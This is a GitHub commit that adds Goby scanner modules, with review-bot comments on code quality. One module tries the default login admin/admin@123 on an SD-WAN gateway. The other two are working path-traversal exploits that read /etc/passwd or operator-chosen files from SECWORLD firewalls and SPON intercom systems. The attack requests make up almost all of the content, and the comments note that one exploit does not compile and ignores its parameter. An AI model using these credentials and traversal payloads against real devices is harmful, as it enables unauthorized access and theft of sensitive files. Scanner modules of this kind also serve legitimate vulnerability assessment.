Add files via upload
MY0723 authored Jul 17, 2022
1 parent 0368088 commit 4e8be94
Showing 100 changed files with 10,237 additions and 0 deletions.
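--- a/SDWAN_smart_gateway_weak_password.json
+++ b/SDWAN_smart_gateway_weak_password.json
@@ -0,0 +1,53 @@
+{
+"Name": "SDWAN智能网关应用系统弱口令",
+"Level": "3",
+"Tags": [],
+"GobyQuery": "body=\"unierm_brand/logo.png\"",
+"Description": "",
+"Product": "",
+"Homepage": "https://gobies.org/",
+"Author": "luckying",
+"Impact": "",
+"Recommandation": "<p>undefined</p>",
+"References": [
+"https://gobies.org/"
+],
+"ScanSteps": [
+"AND",
+{
+"Request": {
+"method": "POST",
+"uri": "/Login/Index/doLogin",
+"follow_redirect": false,
+"header": {
+"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
+},
+"data_type": "text",
+"data": "username=admin&password=admin%40123"
+},
+"ResponseTest": {
+"type": "group",
+"operation": "AND",
+"checks": [
+{
+"type": "item",
+"variable": "$body",
+"operation": "contains",
+"value": "true",
+"bz": ""
+},
+{
+"type": "item",
+"variable": "$body",
+"operation": "contains",
+"value": "userid",
+"bz": ""
+}
+]
+},
+"SetVariable": []
+}
+],
+"PostTime": "2021-06-23 18:32:59",
+"GobyVersion": "1.8.268"
+}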
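Review bot: The two items in `checks` are bare substring matches on `true` and `userid` with no status-code condition, so any response body containing both words is reported as a successful default-credential login; adding a `"variable": "$code"`, `"operation": "==`", `"value": "200"` item to the group would cut false positives. `Description`, `Product` and `Impact` are empty and `Recommandation` is the literal `<p>undefined</p>`, so a finding from this rule gives the device owner no remediation guidance; text along the lines of `<p>Change the default administrator password and restrict access to the management interface.</p>` would make it actionable. The rule also submits a real login attempt, which should be stated in `Description` because it can cause account lockout or alerts on the scanned system.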
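--- a/SECWORLD_Next_generation_firewall_pki_file_download_File_read.go
+++ b/SECWORLD_Next_generation_firewall_pki_file_download_File_read.go
@@ -0,0 +1,101 @@
+package exploits
+
+import (
+"fmt"
+"git.gobies.org/goby/goscanner/goutils"
+"git.gobies.org/goby/goscanner/jsonvul"
+"git.gobies.org/goby/goscanner/scanconfig"
+"git.gobies.org/goby/httpclient"
+"strings"
+)
+
+func init() {
+expJson := `{
+"Name": "SECWORLD Next generation firewall pki_file_download File read",
+"Description": "SECWORLD Next generation firewall pki_file_download File read",
+"Product": "SECWORLD Next generation firewall",
+"Homepage": "https://www.netentsec.com/",
+"DisclosureDate": "2021-05-18",
+"Author": "PeiQi",
+"GobyQuery": "(app=\"Secworld-Firewall\" || title=\"网神下一代极速防火墙\")",
+"Level": "1",
+"Impact": "File read",
+"Recommendation": "",
+"References": [
+"http://wiki.peiqi.tech"
+],
+"HasExp": true,
+"ExpParams": [
+{
+"name": "File",
+"type": "input",
+"value": "/etc/passwd"
+}
+],
+"ScanSteps": [
+"AND",
+{
+"Request": {
+"data": "",
+"data_type": "text",
+"follow_redirect": true,
+"method": "GET",
+"uri": "/"
+},
+"ResponseTest": {
+"checks": [
+{
+"bz": "",
+"operation": "==",
+"type": "item",
+"value": "200",
+"variable": "$code"
+}
+],
+"operation": "AND",
+"type": "group"
+}
+}
+],
+"ExploitSteps": null,
+"Tags": ["File read"],
+"CVEIDs": null,
+"CVSSScore": "0.0",
+"AttackSurfaces": {
+"Application": ["SECWORLD Next generation firewall"],
+"Support": null,
+"Service": null,
+"System": null,
+"Hardware": null
+}
+}`
+
+ExpManager.AddExploit(NewExploit(
+goutils.GetFileName(),
+expJson,
+func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
+uri := "/?g=pki_file_download&filename=../../../../../etc/passwd"
+cfg := httpclient.NewGetRequestConfig(uri)
+cfg.VerifyTls = false
+cfg.FollowRedirect = false
+cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
+if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil {
+return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "root:")
+}
+return false
+},
+func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
+file := ss.Params["File"].(string)
+uri := "/?g=pki_file_download&filename=../../../../../etc/passwd"
+cfg := httpclient.NewGetRequestConfig(uri)
+cfg.VerifyTls = false
+cfg.FollowRedirect = false
+cfg.Header.Store("Content-type", "application/x-www-form-urlencoded")
+if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err == nil {
+expResult.Output = resp.Utf8Html
+expResult.Success = true
+}
+return expResult
+},
+))
+}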
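Review bot: This file does not build as committed: `fmt` is imported but never used, and `file := ss.Params["File"].(string)` in the second callback is assigned and never read, both of which the Go compiler rejects. That single-value type assertion would also panic the scanner when the `File` parameter is missing or not a string; since the request URI is a fixed literal, the simplest cleanup is to delete the line along with the `"fmt"` import and the `File` entry in `ExpParams`. The second callback sets `expResult.Success = true` for any response that returns without error, including an error page or redirect, so results are over-reported; gate it with `err == nil && resp.StatusCode == 200` as the first callback does. `Recommendation` is an empty string, so the finding carries no remediation guidance for the device owner.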
@@ -0,0 +1,134 @@
package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
)

func init() {
expJson := `{
"Name": "SPON IP network intercom broadcast system exportrecord.php any file download",
"Description": "World Bond Communication Co., Ltd. is an audio as the core of the Internet of things solution provider. An arbitrary file reading vulnerability exists in the IP network intercom broadcast system of WorldBond Communication Co., LTD., which can be used by attackers to obtain sensitive information",
"Product": "SPON IP network intercom broadcast system",
"Homepage": "https://www.spon.com.cn/",
"DisclosureDate": "2021-08-24",
"Author": "[email protected]",
"GobyQuery": "body=\"lan/manifest.json\"",
"Level": "2",
"Impact": "<p>The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (.. \\ or.. /) to download or read a file beyond the original specified path. The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system<br></p>",
"Recommandation": "<p>Limit ../ The best way is that the file should be in the database for one to one mapping, avoid entering the absolute path to obtain the file<br></p>",
"References": [],
"HasExp": true,
"ExpParams": [
{
"name": "filepath",
"type": "createSelect",
"value": "../php/exportrecord.php,C:/ICPAS/Wnmp/WWW/php/exportrecord.php,C:/windows/win.ini,/etc/passwd,/proc/version,/home/xc9000/Wnmp/WWW/php/exportrecord.php",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
"Request": {
"method": "GET",
"uri": "/php/exportrecord.php?downname=c:/windows/win.ini",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "[fonts]",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "GET",
"uri": "/php/exportrecord.php?downname=../../../../../etc/passwd",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "root",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/php/exportrecord.php?downname={{{filepath}}}",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"SetVariable": [
"output|lastbody"
]
}
],
"Tags": [
"file download"
],
"CVEIDs": null,
"CVSSScore": "0.0",
"AttackSurfaces": {
"Application": ["SPON IP network intercom broadcast system"],
"Support": null,
"Service": null,
"System": null,
"Hardware": null
}
}`

ExpManager.AddExploit(NewExploit(
goutils.GetFileName(),
expJson,
nil,
nil,
))
}
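Review bot: The second `ScanSteps` entry reports a hit whenever a 200 response body contains the bare word `root`, and with `"follow_redirect": true` under a top-level `OR` any landing or error page containing that word marks the host as vulnerable; match at least `root:` as the SECWORLD check in this commit does, to keep false positives out of scan reports. The remediation key is spelled `Recommandation` here while the SECWORLD file uses `Recommendation`; if the loader reads only one spelling the text may be silently dropped, which is worth confirming. The remediation text itself should tell the device owner what to fix: resolve the requested name to a canonical path, verify it stays inside the intended export directory, and reject absolute paths and `..` segments.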